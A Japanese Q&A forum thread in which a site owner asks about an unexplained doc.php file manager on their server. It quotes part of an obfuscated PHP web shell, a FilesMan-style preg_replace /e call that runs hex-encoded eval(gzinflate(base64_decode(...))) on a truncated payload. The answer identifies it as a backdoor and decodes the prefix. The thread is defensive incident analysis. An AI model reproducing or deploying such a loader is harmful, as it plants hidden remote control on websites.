PHP 見知らぬ巨大な正規表現の結果を取得する方法を教えてください

ファイルマネジャーに関連しているdoc.phpファイル内に、以下のコードを見つけました。
基本的には、存在するすべてのファイルを現在のディレクトリにリストアップするもので、ここでディレクトリの変更が可能なものです。

どうもすべてのファイルにアクセスでき、編集や名称変更、削除もできるようなのですが、私自身インストールした覚えがないのです。

色々調べて、怪しいかなと思われるファイルを削除したり、ファイルを開くためのパスワードを再設定しなおしたりしましたが解決しませんでした。

そもそも、どうして以下の正規表現が自分のサイト/ディレクトリに入ってしまったのか分かりません。
怖いのでとりあえずpreg_replaceの結果を見るには、どうすればよいでしょうか。PHPのセキュリティに詳しい方どなたか教えていただけないでしょうか。

<?php $auth_pass = "; $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251"; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/","."); ?>

行動規範の内容に同意します

回答1件

ベストアンサー

これはちょっと異常ですね。
正規表現の/.*/は、基本的には「全てに一致」を意味します。

しかしeは次の大きいhexのパラメータを評価する役割があります。
コードを隠すにはこういった方法をとることもあります。

ちなみに下記はこれがバックドアだということを示してるので、すぐに削除したほうがよいと思います。もしかしたら、質問者さんのシステムが危ない状態にあるかもしれません。

hexの部分をdecodeしたらこうなってしまいます。

\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28 実際の表記 eval(gzinflate(base64_decode(

もし私だったら使い捨てのバーチャルマシンでない限り、置換結果のPHPコードを実行することはしないですね。

投稿2014/04/01 08:35